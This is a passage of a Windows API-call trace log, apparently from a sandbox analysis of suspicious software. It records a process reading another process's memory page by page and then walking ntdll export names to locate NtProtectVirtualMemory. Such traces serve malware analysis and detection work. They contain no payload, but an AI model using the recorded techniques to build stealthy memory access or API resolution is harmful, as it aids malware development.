ProcessHandle=0x174, BaseAddress=0x28b9a000, Buffer=0x7ffb, BufferSize=0xbca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.362] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9b000, Buffer=0x7ffb, BufferSize=0xbcb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.362] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9c000, Buffer=0x7ffb, BufferSize=0xbcc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.363] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9d000, Buffer=0x7ffb, BufferSize=0xbcd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.363] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9e000, Buffer=0x7ffb, BufferSize=0xbce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.363] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9f000, Buffer=0x7ffb, BufferSize=0xbcf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.364] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba0000, Buffer=0x7ffb, BufferSize=0xbd0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.364] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba1000, Buffer=0x7ffb, BufferSize=0xbd1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.364] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba2000, Buffer=0x7ffb, BufferSize=0xbd2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.364] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba3000, Buffer=0x7ffb, BufferSize=0xbd3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.365] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba4000, Buffer=0x7ffb, BufferSize=0xbd4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.365] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba5000, Buffer=0x7ffb, BufferSize=0xbd5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.366] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba6000, Buffer=0x7ffb, BufferSize=0xbd6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.366] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba7000, Buffer=0x7ffb, BufferSize=0xbd7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.366] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba8000, Buffer=0x7ffb, BufferSize=0xbd8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.367] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba9000, Buffer=0x7ffb, BufferSize=0xbd9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.367] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28baa000, Buffer=0x7ffb, BufferSize=0xbda000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.367] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bab000, Buffer=0x7ffb, BufferSize=0xbdb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.368] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bac000, Buffer=0x7ffb, BufferSize=0xbdc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.368] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bad000, Buffer=0x7ffb, BufferSize=0xbdd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.368] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bae000, Buffer=0x7ffb, BufferSize=0xbde000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.368] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28baf000, Buffer=0x7ffb, BufferSize=0xbdf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.369] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb0000, Buffer=0x7ffb, BufferSize=0xbe0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.369] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb1000, Buffer=0x7ffb, BufferSize=0xbe1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.369] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb2000, Buffer=0x7ffb, BufferSize=0xbe2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.370] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb3000, Buffer=0x7ffb, BufferSize=0xbe3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.370] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb4000, Buffer=0x7ffb, BufferSize=0xbe4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.371] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb5000, Buffer=0x7ffb, BufferSize=0xbe5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.419] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb6000, Buffer=0x7ffb, BufferSize=0xbe6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.420] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb7000, Buffer=0x7ffb, BufferSize=0xbe7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.420] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb8000, Buffer=0x7ffb, BufferSize=0xbe8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.420] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb9000, Buffer=0x7ffb, BufferSize=0xbe9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.421] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bba000, Buffer=0x7ffb, BufferSize=0xbea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.421] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbb000, Buffer=0x7ffb, BufferSize=0xbeb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.421] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbc000, Buffer=0x7ffb, BufferSize=0xbec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.422] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbd000, Buffer=0x7ffb, BufferSize=0xbed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.422] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbe000, Buffer=0x7ffb, BufferSize=0xbee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.422] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbf000, Buffer=0x7ffb, BufferSize=0xbef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.423] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc0000, Buffer=0x7ffb, BufferSize=0xbf0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.423] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc1000, Buffer=0x7ffb, BufferSize=0xbf1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.424] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc2000, Buffer=0x7ffb, BufferSize=0xbf2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.424] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc3000, Buffer=0x7ffb, BufferSize=0xbf3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.424] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc4000, Buffer=0x7ffb, BufferSize=0xbf4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.425] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc5000, Buffer=0x7ffb, BufferSize=0xbf5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.425] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc6000, Buffer=0x7ffb, BufferSize=0xbf6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.425] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc7000, Buffer=0x7ffb, BufferSize=0xbf7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.426] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc8000, Buffer=0x7ffb, BufferSize=0xbf8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.426] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc9000, Buffer=0x7ffb, BufferSize=0xbf9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.426] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bca000, Buffer=0x7ffb, BufferSize=0xbfa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.427] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bcb000, Buffer=0x7ffb, BufferSize=0xbfb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.427] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bcc000, Buffer=0x7ffb, BufferSize=0xbfc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.427] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bcd000, Buffer=0x7ffb, BufferSize=0xbfd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.428] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bce000, Buffer=0x7ffb, BufferSize=0xbfe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.428] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bcf000, Buffer=0x7ffb, BufferSize=0xbff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.428] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd0000, Buffer=0x7ffb, BufferSize=0xc00000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.429] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd1000, Buffer=0x7ffb, BufferSize=0xc01000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.429] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd2000, Buffer=0x7ffb, BufferSize=0xc02000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.429] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd3000, Buffer=0x7ffb, BufferSize=0xc03000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.430] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd4000, Buffer=0x7ffb, BufferSize=0xc04000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.430] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd5000, Buffer=0x7ffb, BufferSize=0xc05000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.430] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd6000, Buffer=0x7ffb, BufferSize=0xc06000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.430] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd7000, Buffer=0x7ffb, BufferSize=0xc07000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.431] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd8000, Buffer=0x7ffb, BufferSize=0xc08000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.431] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd9000, Buffer=0x7ffb, BufferSize=0xc09000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.431] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bda000, Buffer=0x7ffb, BufferSize=0xc0a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.432] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdb000, Buffer=0x7ffb, BufferSize=0xc0b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.432] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdc000, Buffer=0x7ffb, BufferSize=0xc0c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.432] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdd000, Buffer=0x7ffb, BufferSize=0xc0d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.433] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bde000, Buffer=0x7ffb, BufferSize=0xc0e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.433] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdf000, Buffer=0x7ffb, BufferSize=0xc0f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.433] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be0000, Buffer=0x7ffb, BufferSize=0xc10000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.433] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be1000, Buffer=0x7ffb, BufferSize=0xc11000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.434] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be2000, Buffer=0x7ffb, BufferSize=0xc12000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.434] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be3000, Buffer=0x7ffb, BufferSize=0xc13000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.434] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be4000, Buffer=0x7ffb, BufferSize=0xc14000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.435] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be5000, Buffer=0x7ffb, BufferSize=0xc15000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.435] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be6000, Buffer=0x7ffb, BufferSize=0xc16000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.436] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be7000, Buffer=0x7ffb, BufferSize=0xc17000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.436] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be8000, Buffer=0x7ffb, BufferSize=0xc18000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.761] lstrcmpA (lpString1="A_SHAFinal", lpString2="NtProtectVirtualMemory") returned -1 [0141.761] lstrcmpA (lpString1="A_SHAInit", lpString2="NtProtectVirtualMemory") returned -1 [0141.761] lstrcmpA (lpString1="A_SHAUpdate", lpString2="NtProtectVirtualMemory") returned -1 [0141.761] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="NtProtectVirtualMemory") returned -1 [0141.761] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="NtProtectVirtualMemory") returned -1 [0141.762] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="CsrClientCallServer", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="CsrGetProcessId", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgBreakPoint", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgPrint", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgPrintEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgPrompt", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgUiContinue", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="NtProtectVirtualMemory") returned -1 [0141.763] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventEnabled", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventRegister", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventUnregister", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventWrite", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventWriteString", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="NtProtectVirtualMemory") returned -1 [0141.764] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="NtProtectVirtualMemory") returned -1 [0141.765] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="NtProtectVirtualMemory") returned -1 [0141.765] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="NtProtectVirtualMemory") returned -1 [0141.765] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="NtProtectVirtualMemory") returned -1 [0141.765] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="NtProtectVirtualMemory") returned -1 [0141.765] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="NtProtectVirtualMemory") returned -1 [0141.765] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="NtProtectVirtualMemory") returned -1 [0141.765] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="NtProtectVirtualMemory") returned -1 [0141.765] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="NtProtectVirtualMemory") returned -1 [0141.765] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="NtProtectVirtualMemory") returned -1 [0141.765] lstrcmpA (lpString1="EtwReplyNotification", lpString2="NtProtectVirtualMemory") returned -1 [0141.766] lstrcmpA (lpString1="EtwSendNotification", lpString2="NtProtectVirtualMemory") returned -1 [0141.766] lstrcmpA (lpString1="EtwSetMark", lpString2="NtProtectVirtualMemory") returned -1 [0141.766] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="NtProtectVirtualMemory") returned -1 [0141.766] lstrcmpA (lpString1="EtwTraceMessage", lpString2="NtProtectVirtualMemory") returned -1 [0141.766] lstrcmpA 